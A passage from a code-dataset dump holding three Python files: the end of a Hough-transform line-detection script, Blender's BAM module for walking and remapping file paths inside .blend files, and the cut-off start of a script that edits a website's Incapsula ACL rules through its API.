rho.append(x)\n theta.append(y)\n if (y == 126):\n rho.append(x)\n theta.append(y)\n \nimg2 = cv2.imread(\"hough.jpg\", 0)\nimg3 = cv2.imread(\"hough.jpg\")\nr,c = img2.shape\n\nx = []\ny = []\n\nfor i in range (len(theta)):\n p = rho[i]\n q = theta[i]\n for i in range (r):\n k = (p-(i*np.cos(np.deg2rad(q))))/(np.sin(np.deg2rad(q)))\n if (k > 0 and k <= 666):\n x.append(i)\n y.append(int(k)) \n \nfor i in range (len(x)):\n a = x[i]\n b = y[i]\n img3[a][b] = [0,255,0]\n\ncv2.imwrite(\"blue_line.jpg\", img3)\n\n###<<<<<<-----------------------------red lines detection---------------------------->>>>>>######\n\nrho = []\ntheta = []\n\nidx = np.unravel_index(np.argsort(accumulator.ravel())[-1000:], accumulator.shape)\n\nfor i in range (len(idx[0])):\n x = idx[0][i]\n y = idx[1][i]\n if (y == 92):\n rho.append(x)\n theta.append(y)\n \nimg2 = cv2.imread(\"hough.jpg\", 0)\nimg3 = cv2.imread(\"hough.jpg\")\nr,c = img2.shape\n\nx = []\ny = []\n\nfor i in range (len(theta)):\n p = rho[i]\n q = theta[i]\n for i in range (r):\n k = (p-(i*np.cos(np.deg2rad(q))))/(np.sin(np.deg2rad(q)))\n if (k > 0 and k <= 666):\n x.append(i)\n y.append(int(k)) \n \nfor i in range (len(x)):\n a = x[i]\n b = y[i]\n img3[a][b] = [0,255,0]\n \ncv2.imwrite(\"red_line.jpg\", img3)","sub_path":"Computer Vision and Image Processing/Project 3 - Morphology image processing, Image segmentation and point detection, Hough transform/3. Hough transform/a,b/Task3_a_b.py","file_name":"Task3_a_b.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"361577733","text":"#!/usr/bin/env python3\n\n# ***** BEGIN GPL LICENSE BLOCK *****\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# ***** END GPL LICENCE BLOCK *****\n\nimport os\nimport logging\n\nfrom . import blendfile\n\n# gives problems with scripts that use stdout, for testing 'bam deps' for eg.\nDEBUG = False\nVERBOSE = DEBUG or False # os.environ.get('BAM_VERBOSE', False)\nTIMEIT = False\n\nUSE_ALEMBIC_BRANCH = True\n\n\nclass C_defs:\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n # DNA_sequence_types.h (Sequence.type)\n SEQ_TYPE_IMAGE = 0\n SEQ_TYPE_META = 1\n SEQ_TYPE_SCENE = 2\n SEQ_TYPE_MOVIE = 3\n SEQ_TYPE_SOUND_RAM = 4\n SEQ_TYPE_SOUND_HD = 5\n SEQ_TYPE_MOVIECLIP = 6\n SEQ_TYPE_MASK = 7\n SEQ_TYPE_EFFECT = 8\n\n IMA_SRC_FILE = 1\n IMA_SRC_SEQUENCE = 2\n IMA_SRC_MOVIE = 3\n\n # DNA_modifier_types.h\n eModifierType_MeshCache = 46\n\n # DNA_particle_types.h\n PART_DRAW_OB = 7\n PART_DRAW_GR = 8\n\n # DNA_object_types.h\n # Object.transflag\n OB_DUPLIGROUP = 1 << 8\n\n if USE_ALEMBIC_BRANCH:\n CACHE_LIBRARY_SOURCE_CACHE = 1\n\nlog_deps = logging.getLogger(\"path_walker\")\nlog_deps.setLevel({\n (True, True): logging.DEBUG,\n (False, True): logging.INFO,\n (False, False): logging.WARNING\n}[DEBUG, VERBOSE])\n\nif VERBOSE:\n def set_as_str(s):\n if s is None:\n return \"None\"\n return \", \".join(sorted(str(i) for i in s))\n\n\nclass FPElem:\n \"\"\"\n Tiny filepath class to hide blendfile.\n \"\"\"\n\n __slots__ = (\n \"basedir\",\n\n # library link level\n \"level\",\n\n # True when this is apart of a sequence (image or movieclip)\n \"is_sequence\",\n\n \"userdata\",\n )\n\n def __init__(self, basedir, level,\n # subclasses get/set functions should use\n userdata):\n self.basedir = basedir\n self.level = level\n self.is_sequence = False\n\n # subclass must call\n self.userdata = userdata\n\n def files_siblings(self):\n return ()\n\n # --------\n # filepath\n\n def filepath_absolute_resolve(self, basedir=None):\n \"\"\"\n Resolve the filepath, with the option to override the basedir.\n \"\"\"\n filepath = self.filepath\n if filepath.startswith(b'//'):\n if basedir is None:\n basedir = self.basedir\n return os.path.normpath(os.path.join(\n basedir,\n utils.compatpath(filepath[2:]),\n ))\n else:\n return utils.compatpath(filepath)\n\n def filepath_assign_edits(self, filepath, binary_edits):\n self._set_cb_edits(filepath, binary_edits)\n\n @staticmethod\n def _filepath_assign_edits(block, path, filepath, binary_edits):\n \"\"\"\n Record the write to a separate entry (binary file-like object),\n this lets us replay the edits later.\n (so we can replay them onto the clients local cache without a file transfer).\n \"\"\"\n import struct\n assert(type(filepath) is bytes)\n assert(type(path) is bytes)\n ofs, size = block.get_file_offset(path)\n # ensure we dont write past the field size & allow for \\0\n filepath = filepath[:size - 1]\n binary_edits.append((ofs, filepath + b'\\0'))\n\n @property\n def filepath(self):\n return self._get_cb()\n\n @filepath.setter\n def filepath(self, filepath):\n self._set_cb(filepath)\n\n @property\n def filepath_absolute(self):\n return self.filepath_absolute_resolve()\n\n\nclass FPElem_block_path(FPElem):\n \"\"\"\n Simple block-path:\n userdata = (block, path)\n \"\"\"\n __slots__ = ()\n\n def _get_cb(self):\n block, path = self.userdata\n return block[path]\n\n def _set_cb(self, filepath):\n block, path = self.userdata\n block[path] = filepath\n\n def _set_cb_edits(self, filepath, binary_edits):\n block, path = self.userdata\n self._filepath_assign_edits(block, path, filepath, binary_edits)\n\n\nclass FPElem_sequence_single(FPElem):\n \"\"\"\n Movie sequence\n userdata = (block, path, sub_block, sub_path)\n \"\"\"\n __slots__ = ()\n\n def _get_cb(self):\n block, path, sub_block, sub_path = self.userdata\n return block[path] + sub_block[sub_path]\n\n def _set_cb(self, filepath):\n block, path, sub_block, sub_path = self.userdata\n head, sep, tail = utils.splitpath(filepath)\n\n block[path] = head + sep\n sub_block[sub_path] = tail\n\n def _set_cb_edits(self, filepath, binary_edits):\n block, path, sub_block, sub_path = self.userdata\n head, sep, tail = utils.splitpath(filepath)\n\n self._filepath_assign_edits(block, path, head + sep, binary_edits)\n self._filepath_assign_edits(sub_block, sub_path, tail, binary_edits)\n\n\nclass FPElem_sequence_image_seq(FPElem_sequence_single):\n \"\"\"\n Image sequence\n userdata = (block, path, sub_block, sub_path)\n \"\"\"\n __slots__ = ()\n\n def files_siblings(self):\n block, path, sub_block, sub_path = self.userdata\n\n array = block.get_pointer(b'stripdata')\n files = [array.get(b'name', use_str=False, base_index=i) for i in range(array.count)]\n return files\n\n\nclass FilePath:\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n # ------------------------------------------------------------------------\n # Main function to visit paths\n @staticmethod\n def visit_from_blend(\n filepath,\n\n # never modify the blend\n readonly=True,\n # callback that creates a temp file and returns its path.\n temp_remap_cb=None,\n\n # recursive options\n recursive=False,\n # recurse all indirectly linked data\n # (not just from the initially referenced blend file)\n recursive_all=False,\n # list of ID block names we want to load, or None to load all\n block_codes=None,\n # root when we're loading libs indirectly\n rootdir=None,\n level=0,\n # dict of id's used so we don't follow these links again\n # prevents cyclic references too!\n # {lib_path: set([block id's ...])}\n lib_visit=None,\n\n # optional blendfile callbacks\n # These callbacks run on enter-exit blend files\n # so you can keep track of what file and level you're at.\n blendfile_level_cb=(None, None),\n ):\n # print(level, block_codes)\n import os\n\n filepath = os.path.abspath(filepath)\n\n indent_str = \" \" * level\n # print(indent_str + \"Opening:\", filepath)\n # print(indent_str + \"... blocks:\", block_codes)\n\n log = log_deps.getChild('visit_from_blend')\n log.info(\"~\")\n log.info(\"%sOpening: %s\", indent_str, filepath)\n if VERBOSE:\n log.info(\"%s blocks: %s\", indent_str, set_as_str(block_codes))\n\n blendfile_level_cb_enter, blendfile_level_cb_exit = blendfile_level_cb\n\n if blendfile_level_cb_enter is not None:\n blendfile_level_cb_enter(filepath)\n\n basedir = os.path.dirname(filepath)\n if rootdir is None:\n rootdir = basedir\n\n if lib_visit is None:\n lib_visit = {}\n\n\n\n if recursive and (level > 0) and (block_codes is not None) and (recursive_all is False):\n # prevent from expanding the\n # same datablock more then once\n # note: we could *almost* id_name, however this isn't unique for libraries.\n expand_addr_visit = set()\n # {lib_id: {block_ids... }}\n expand_codes_idlib = {}\n\n # libraries used by this blend\n block_codes_idlib = set()\n\n # XXX, checking 'block_codes' isn't 100% reliable,\n # but at least don't touch the same blocks twice.\n # whereas block_codes is intended to only operate on blocks we requested.\n lib_block_codes_existing = lib_visit.setdefault(filepath, set())\n\n # only for this block\n def _expand_codes_add_test(block, code):\n # return True, if the ID should be searched further\n #\n # we could investigate a better way...\n # Not to be accessing ID blocks at this point. but its harmless\n if code == b'ID':\n assert(code == block.code)\n if recursive:\n expand_codes_idlib.setdefault(block[b'lib'], set()).add(block[b'name'])\n return False\n else:\n id_name = block[b'id', b'name']\n\n # if we touched this already, don't touch again\n # (else we may modify the same path multiple times)\n #\n # FIXME, works in some cases but not others\n # keep, without this we get errors\n # Gooseberry r668\n # bam pack scenes/01_island/01_meet_franck/01_01_01_A/01_01_01_A.comp.blend\n # gives strange errors\n '''\n if id_name not in block_codes:\n return False\n '''\n\n # instead just don't operate on blocks multiple times\n # ... rather than attempt to check on what we need or not.\n len_prev = len(lib_block_codes_existing)\n lib_block_codes_existing.add(id_name)\n if len_prev == len(lib_block_codes_existing):\n return False\n\n len_prev = len(expand_addr_visit)\n expand_addr_visit.add(block.addr_old)\n return (len_prev != len(expand_addr_visit))\n\n def block_expand(block, code):\n assert(block.code == code)\n if _expand_codes_add_test(block, code):\n yield block\n\n assert(block.code == code)\n fn = ExpandID.expand_funcs.get(code)\n if fn is not None:\n for sub_block in fn(block):\n if sub_block is not None:\n yield from block_expand(sub_block, sub_block.code)\n else:\n if code == b'ID':\n yield block\n else:\n expand_addr_visit = None\n\n # set below\n expand_codes_idlib = None\n\n # never set\n block_codes_idlib = None\n\n def block_expand(block, code):\n assert(block.code == code)\n yield block\n\n # ------\n # Define\n #\n # - iter_blocks_id(code)\n # - iter_blocks_idlib()\n if block_codes is None:\n def iter_blocks_id(code):\n return blend.find_blocks_from_code(code)\n\n def iter_blocks_idlib():\n return blend.find_blocks_from_code(b'LI')\n else:\n def iter_blocks_id(code):\n for block in blend.find_blocks_from_code(code):\n if block[b'id', b'name'] in block_codes:\n yield from block_expand(block, code)\n\n if block_codes_idlib is not None:\n def iter_blocks_idlib():\n for block in blend.find_blocks_from_code(b'LI'):\n # TODO, this should work but in fact mades some libs not link correctly.\n if block[b'name'] in block_codes_idlib:\n yield from block_expand(block, b'LI')\n else:\n def iter_blocks_idlib():\n return blend.find_blocks_from_code(b'LI')\n\n if temp_remap_cb is not None:\n filepath_tmp = temp_remap_cb(filepath, rootdir)\n else:\n filepath_tmp = filepath\n\n # store info to pass along with each iteration\n extra_info = rootdir, os.path.basename(filepath)\n\n with blendfile.open_blend(filepath_tmp, \"rb\" if readonly else \"r+b\") as blend:\n\n for code in blend.code_index.keys():\n # handle library blocks as special case\n if ((len(code) != 2) or\n (code in {\n # libraries handled below\n b'LI',\n b'ID',\n # unneeded\n b'WM',\n b'SN', # bScreen\n })):\n\n continue\n\n # if VERBOSE:\n # print(\" Scanning\", code)\n\n for block in iter_blocks_id(code):\n yield from FilePath.from_block(block, basedir, extra_info, level)\n\n # print(\"A:\", expand_addr_visit)\n # print(\"B:\", block_codes)\n if VERBOSE:\n log.info(\"%s expand_addr_visit=%s\", indent_str, set_as_str(expand_addr_visit))\n\n if recursive:\n\n if expand_codes_idlib is None:\n expand_codes_idlib = {}\n for block in blend.find_blocks_from_code(b'ID'):\n expand_codes_idlib.setdefault(block[b'lib'], set()).add(block[b'name'])\n\n # look into libraries\n lib_all = []\n\n for lib_id, lib_block_codes in sorted(expand_codes_idlib.items()):\n lib = blend.find_block_from_offset(lib_id)\n lib_path = lib[b'name']\n\n # get all data needed to read the blend files here (it will be freed!)\n # lib is an address at the moment, we only use as a way to group\n\n lib_all.append((lib_path, lib_block_codes))\n # import IPython; IPython.embed()\n\n # ensure we expand indirect linked libs\n if block_codes_idlib is not None:\n block_codes_idlib.add(lib_path)\n\n # do this after, incase we mangle names above\n for block in iter_blocks_idlib():\n yield from FilePath.from_block(block, basedir, extra_info, level)\n del blend\n\n\n # ----------------\n # Handle Recursive\n if recursive:\n # now we've closed the file, loop on other files\n\n # note, sorting - isn't needed, it just gives predictable load-order.\n for lib_path, lib_block_codes in lib_all:\n lib_path_abs = os.path.normpath(utils.compatpath(utils.abspath(lib_path, basedir)))\n\n # if we visited this before,\n # check we don't follow the same links more than once\n lib_block_codes_existing = lib_visit.setdefault(lib_path_abs, set())\n lib_block_codes -= lib_block_codes_existing\n\n # don't touch them again\n # XXX, this is now maintained in \"_expand_generic_material\"\n # lib_block_codes_existing.update(lib_block_codes)\n\n # print(\"looking for\", lib_block_codes)\n\n if not lib_block_codes:\n if VERBOSE:\n print((indent_str + \" \"), \"Library Skipped (visited): \", filepath, \" -> \", lib_path_abs, sep=\"\")\n continue\n\n if not os.path.exists(lib_path_abs):\n if VERBOSE:\n print((indent_str + \" \"), \"Library Missing: \", filepath, \" -> \", lib_path_abs, sep=\"\")\n continue\n\n # import IPython; IPython.embed()\n if VERBOSE:\n print((indent_str + \" \"), \"Library: \", filepath, \" -> \", lib_path_abs, sep=\"\")\n # print((indent_str + \" \"), lib_block_codes)\n yield from FilePath.visit_from_blend(\n lib_path_abs,\n readonly=readonly,\n temp_remap_cb=temp_remap_cb,\n recursive=True,\n block_codes=lib_block_codes,\n rootdir=rootdir,\n level=level + 1,\n lib_visit=lib_visit,\n blendfile_level_cb=blendfile_level_cb,\n )\n\n if blendfile_level_cb_exit is not None:\n blendfile_level_cb_exit(filepath)\n\n # ------------------------------------------------------------------------\n # Direct filepaths from Blocks\n #\n # (no expanding or following references)\n\n @staticmethod\n def from_block(block: blendfile.BlendFileBlock, basedir, extra_info, level):\n assert(block.code != b'DATA')\n fn = FilePath._from_block_dict.get(block.code)\n if fn is None:\n return\n\n yield from fn(block, basedir, extra_info, level)\n\n @staticmethod\n def _from_block_OB(block, basedir, extra_info, level):\n # 'ob->modifiers[...].filepath'\n for block_mod in bf_utils.iter_ListBase(\n block.get_pointer((b'modifiers', b'first')),\n next_item=(b'modifier', b'next')):\n item_md_type = block_mod[b'modifier', b'type']\n if item_md_type == C_defs.eModifierType_MeshCache:\n yield FPElem_block_path(basedir, level, (block_mod, b'filepath')), extra_info\n\n @staticmethod\n def _from_block_MC(block, basedir, extra_info, level):\n # TODO, image sequence\n fp = FPElem_block_path(basedir, level, (block, b'name'))\n fp.is_sequence = True\n yield fp, extra_info\n\n @staticmethod\n def _from_block_IM(block, basedir, extra_info, level):\n # old files miss this\n image_source = block.get(b'source', C_defs.IMA_SRC_FILE)\n if image_source not in {C_defs.IMA_SRC_FILE, C_defs.IMA_SRC_SEQUENCE, C_defs.IMA_SRC_MOVIE}:\n return\n if block[b'packedfile']:\n return\n\n fp = FPElem_block_path(basedir, level, (block, b'name'))\n if image_source == C_defs.IMA_SRC_SEQUENCE:\n fp.is_sequence = True\n yield fp, extra_info\n\n @staticmethod\n def _from_block_VF(block, basedir, extra_info, level):\n if block[b'packedfile']:\n return\n if block[b'name'] != b'': # builtin font\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n @staticmethod\n def _from_block_SO(block, basedir, extra_info, level):\n if block[b'packedfile']:\n return\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n @staticmethod\n def _from_block_ME(block, basedir, extra_info, level):\n block_external = block.get_pointer((b'ldata', b'external'), None)\n if block_external is None:\n block_external = block.get_pointer((b'fdata', b'external'), None)\n\n if block_external is not None:\n yield FPElem_block_path(basedir, level, (block_external, b'filename')), extra_info\n\n if USE_ALEMBIC_BRANCH:\n @staticmethod\n def _from_block_CL(block, basedir, extra_info, level):\n if block[b'source_mode'] == C_defs.CACHE_LIBRARY_SOURCE_CACHE:\n yield FPElem_block_path(basedir, level, (block, b'input_filepath')), extra_info\n\n @staticmethod\n def _from_block_CF(block, basedir, extra_info, level):\n yield FPElem_block_path(basedir, level, (block, b'filepath')), extra_info\n\n\n @staticmethod\n def _from_block_SC(block, basedir, extra_info, level):\n block_ed = block.get_pointer(b'ed')\n if block_ed is not None:\n sdna_index_Sequence = block.file.sdna_index_from_id[b'Sequence']\n\n def seqbase(someseq):\n for item in someseq:\n item_type = item.get(b'type', sdna_index_refine=sdna_index_Sequence)\n\n if item_type >= C_defs.SEQ_TYPE_EFFECT:\n pass\n elif item_type == C_defs.SEQ_TYPE_META:\n yield from seqbase(bf_utils.iter_ListBase(\n item.get_pointer((b'seqbase', b'first'), sdna_index_refine=sdna_index_Sequence)))\n else:\n item_strip = item.get_pointer(b'strip', sdna_index_refine=sdna_index_Sequence)\n if item_strip is None: # unlikely!\n continue\n item_stripdata = item_strip.get_pointer(b'stripdata')\n\n if item_type == C_defs.SEQ_TYPE_IMAGE:\n yield FPElem_sequence_image_seq(\n basedir, level, (item_strip, b'dir', item_stripdata, b'name')), extra_info\n elif item_type in {C_defs.SEQ_TYPE_MOVIE, C_defs.SEQ_TYPE_SOUND_RAM, C_defs.SEQ_TYPE_SOUND_HD}:\n yield FPElem_sequence_single(\n basedir, level, (item_strip, b'dir', item_stripdata, b'name')), extra_info\n\n yield from seqbase(bf_utils.iter_ListBase(block_ed.get_pointer((b'seqbase', b'first'))))\n\n @staticmethod\n def _from_block_LI(block, basedir, extra_info, level):\n if block.get(b'packedfile', None):\n return\n\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n # _from_block_IM --> {b'IM': _from_block_IM, ...}\n _from_block_dict = {\n k.rpartition(\"_\")[2].encode('ascii'): s_fn.__func__ for k, s_fn in locals().items()\n if isinstance(s_fn, staticmethod)\n if k.startswith(\"_from_block_\")\n }\n\n\nclass bf_utils:\n @staticmethod\n def iter_ListBase(block, next_item=b'next'):\n while block:\n yield block\n block = block.file.find_block_from_offset(block[next_item])\n\n def iter_array(block, length=-1):\n assert(block.code == b'DATA')\n from . import blendfile\n import os\n handle = block.file.handle\n header = block.file.header\n\n for i in range(length):\n block.file.handle.seek(block.file_offset + (header.pointer_size * i), os.SEEK_SET)\n offset = blendfile.DNA_IO.read_pointer(handle, header)\n sub_block = block.file.find_block_from_offset(offset)\n yield sub_block\n\n\n# -----------------------------------------------------------------------------\n# ID Expand\n\nclass ExpandID:\n # fake module\n #\n # TODO:\n #\n # Array lookups here are _WAY_ too complicated,\n # we need some nicer way to represent pointer indirection (easy like in C!)\n # but for now, use what we have.\n #\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n @staticmethod\n def _expand_generic_material(block):\n array_len = block.get(b'totcol')\n if array_len != 0:\n array = block.get_pointer(b'mat')\n for sub_block in bf_utils.iter_array(array, array_len):\n yield sub_block\n\n @staticmethod\n def _expand_generic_mtex(block):\n field = block.dna_type.field_from_name[b'mtex']\n array_len = field.dna_size // block.file.header.pointer_size\n\n for i in range(array_len):\n item = block.get_pointer((b'mtex', i))\n if item:\n yield item.get_pointer(b'tex')\n yield item.get_pointer(b'object')\n\n @staticmethod\n def _expand_generic_nodetree(block):\n assert(block.dna_type.dna_type_id == b'bNodeTree')\n\n sdna_index_bNode = block.file.sdna_index_from_id[b'bNode']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'nodes', b'first'))):\n item_type = item.get(b'type', sdna_index_refine=sdna_index_bNode)\n\n if item_type != 221: # CMP_NODE_R_LAYERS\n yield item.get_pointer(b'id', sdna_index_refine=sdna_index_bNode)\n\n def _expand_generic_nodetree_id(block):\n block_ntree = block.get_pointer(b'nodetree', None)\n if block_ntree is not None:\n yield from ExpandID._expand_generic_nodetree(block_ntree)\n\n @staticmethod\n def _expand_generic_animdata(block):\n block_adt = block.get_pointer(b'adt')\n if block_adt:\n yield block_adt.get_pointer(b'action')\n # TODO, NLA\n\n @staticmethod\n def expand_OB(block): # 'Object'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n has_dup_group = False\n yield block.get_pointer(b'data')\n if block[b'transflag'] & C_defs.OB_DUPLIGROUP:\n dup_group = block.get_pointer(b'dup_group')\n if dup_group is not None:\n has_dup_group = True\n yield dup_group\n del dup_group\n\n yield block.get_pointer(b'proxy')\n yield block.get_pointer(b'proxy_collection')\n\n if USE_ALEMBIC_BRANCH:\n if has_dup_group:\n sdna_index_CacheLibrary = block.file.sdna_index_from_id.get(b'CacheLibrary')\n if sdna_index_CacheLibrary is not None:\n yield block.get_pointer(b'cache_library')\n\n # 'ob->pose->chanbase[...].custom'\n block_pose = block.get_pointer(b'pose')\n if block_pose is not None:\n assert(block_pose.dna_type.dna_type_id == b'bPose')\n sdna_index_bPoseChannel = block_pose.file.sdna_index_from_id[b'bPoseChannel']\n for item in bf_utils.iter_ListBase(block_pose.get_pointer((b'chanbase', b'first'))):\n item_custom = item.get_pointer(b'custom', sdna_index_refine=sdna_index_bPoseChannel)\n if item_custom is not None:\n yield item_custom\n # Expand the objects 'ParticleSettings' via:\n # 'ob->particlesystem[...].part'\n sdna_index_ParticleSystem = block.file.sdna_index_from_id.get(b'ParticleSystem')\n if sdna_index_ParticleSystem is not None:\n for item in bf_utils.iter_ListBase(\n block.get_pointer((b'particlesystem', b'first'))):\n item_part = item.get_pointer(b'part', sdna_index_refine=sdna_index_ParticleSystem)\n if item_part is not None:\n yield item_part\n\n @staticmethod\n def expand_ME(block): # 'Mesh'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n yield block.get_pointer(b'texcomesh')\n # TODO, TexFace? - it will be slow, we could simply ignore :S\n\n @staticmethod\n def expand_CU(block): # 'Curve'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n sub_block = block.get_pointer(b'vfont')\n if sub_block is not None:\n yield sub_block\n yield block.get_pointer(b'vfontb')\n yield block.get_pointer(b'vfonti')\n yield block.get_pointer(b'vfontbi')\n\n yield block.get_pointer(b'bevobj')\n yield block.get_pointer(b'taperobj')\n yield block.get_pointer(b'textoncurve')\n\n @staticmethod\n def expand_MB(block): # 'MBall'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n @staticmethod\n def expand_AR(block): # 'bArmature'\n yield from ExpandID._expand_generic_animdata(block)\n\n @staticmethod\n def expand_LA(block): # 'Lamp'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_MA(block): # 'Material'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n yield block.get_pointer(b'group')\n\n @staticmethod\n def expand_TE(block): # 'Tex'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield block.get_pointer(b'ima')\n\n @staticmethod\n def expand_WO(block): # 'World'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_NT(block): # 'bNodeTree'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree(block)\n\n @staticmethod\n def expand_PA(block): # 'ParticleSettings'\n yield from ExpandID._expand_generic_animdata(block)\n block_ren_as = block[b'ren_as']\n if block_ren_as == C_defs.PART_DRAW_GR:\n yield block.get_pointer(b'dup_group')\n elif block_ren_as == C_defs.PART_DRAW_OB:\n yield block.get_pointer(b'dup_ob')\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_SC(block): # 'Scene'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield block.get_pointer(b'camera')\n yield block.get_pointer(b'world')\n yield block.get_pointer(b'set', None)\n yield block.get_pointer(b'clip', None)\n\n sdna_index_Base = block.file.sdna_index_from_id[b'Base']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'base', b'first'))):\n yield item.get_pointer(b'object', sdna_index_refine=sdna_index_Base)\n\n block_ed = block.get_pointer(b'ed')\n if block_ed is not None:\n sdna_index_Sequence = block.file.sdna_index_from_id[b'Sequence']\n\n def seqbase(someseq):\n for item in someseq:\n item_type = item.get(b'type', sdna_index_refine=sdna_index_Sequence)\n\n if item_type >= C_defs.SEQ_TYPE_EFFECT:\n pass\n elif item_type == C_defs.SEQ_TYPE_META:\n yield from seqbase(bf_utils.iter_ListBase(\n item.get_pointer((b'seqbase' b'first'), sdna_index_refine=sdna_index_Sequence)))\n else:\n if item_type == C_defs.SEQ_TYPE_SCENE:\n yield item.get_pointer(b'scene')\n elif item_type == C_defs.SEQ_TYPE_MOVIECLIP:\n yield item.get_pointer(b'clip')\n elif item_type == C_defs.SEQ_TYPE_MASK:\n yield item.get_pointer(b'mask')\n elif item_type == C_defs.SEQ_TYPE_SOUND_RAM:\n yield item.get_pointer(b'sound')\n\n yield from seqbase(bf_utils.iter_ListBase(\n block_ed.get_pointer((b'seqbase', b'first'))))\n\n @staticmethod\n def expand_GR(block): # 'Group'\n sdna_index_GroupObject = block.file.sdna_index_from_id[b'GroupObject']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'gobject', b'first'))):\n yield item.get_pointer(b'ob', sdna_index_refine=sdna_index_GroupObject)\n\n # expand_GR --> {b'GR': expand_GR, ...}\n expand_funcs = {\n k.rpartition(\"_\")[2].encode('ascii'): s_fn.__func__ for k, s_fn in locals().items()\n if isinstance(s_fn, staticmethod)\n if k.startswith(\"expand_\")\n }\n\n\n# -----------------------------------------------------------------------------\n# Packing Utility\n\n\nclass utils:\n # fake module\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n @staticmethod\n def abspath(path, start, library=None):\n import os\n if path.startswith(b'//'):\n # if library:\n # start = os.path.dirname(abspath(library.filepath))\n return os.path.join(start, path[2:])\n return path\n\n if __import__(\"os\").sep == '/':\n @staticmethod\n def compatpath(path):\n return path.replace(b'\\\\', b'/')\n else:\n @staticmethod\n def compatpath(path):\n # keep '//'\n return path[:2] + path[2:].replace(b'/', b'\\\\')\n\n @staticmethod\n def splitpath(path):\n \"\"\"\n Splits the path using either slashes\n \"\"\"\n split1 = path.rpartition(b'/')\n split2 = path.rpartition(b'\\\\')\n if len(split1[0]) > len(split2[0]):\n return split1\n else:\n return split2\n\n def find_sequence_paths(filepath, use_fullpath=True):\n # supports str, byte paths\n basedir, filename = os.path.split(filepath)\n if not os.path.exists(basedir):\n return []\n\n filename_noext, ext = os.path.splitext(filename)\n\n from string import digits\n if isinstance(filepath, bytes):\n digits = digits.encode()\n filename_nodigits = filename_noext.rstrip(digits)\n\n if len(filename_nodigits) == len(filename_noext):\n # input isn't from a sequence\n return []\n\n files = os.listdir(basedir)\n files[:] = [\n f for f in files\n if f.startswith(filename_nodigits) and\n f.endswith(ext) and\n f[len(filename_nodigits):-len(ext) if ext else -1].isdigit()\n ]\n if use_fullpath:\n files[:] = [\n os.path.join(basedir, f) for f in files\n ]\n\n return files\n","sub_path":"engine/2.80/scripts/addons/io_blend_utils/blender_bam-unpacked.whl/bam/blend/blendfile_path_walker.py","file_name":"blendfile_path_walker.py","file_ext":"py","file_size_in_byte":34349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"564665728","text":"#!/usr/bin/env pyton3\n\n\"\"\"Modifies a sites ACL rules\n\n site_id -- numerical site id to retrive\n rule_id -- rule to change\n listed -- list things to send for the rule\n api_id -- API ID to use (Default: enviroment variable)\n api_key -- API KEY to use (Default: enviroment variable)\n\"\"\"\n\nimport os\nimport requests\nfrom .com_error import errorProcess\n\napi_endpoint = 'https://my.incapsula.com/api/'\n\n\ndef modSiteACL(\n site_id, rule_id, listed, api_id=os.environ.get('API_ID'),\n api_key=os.environ.get('API_KEY')):\n try:\n if rule_id == 'api.acl.blacklisted_countries':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'countries':listed\n }\n if rule_id == 'api.acl.blacklisted_urls':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'urls':listed\n }\n if rule_id == 'api.acl.blacklisted_ips':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'ips':listed\n }\n if rule_id == 'api.acl.whitelisted_ips':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'ips':listed\n }\n url = api_endpoint + 'prov/v1/sites/configure/acl'\n r = requests.post(url, data=payload)\n return r.text\n except Exception as error:\n return 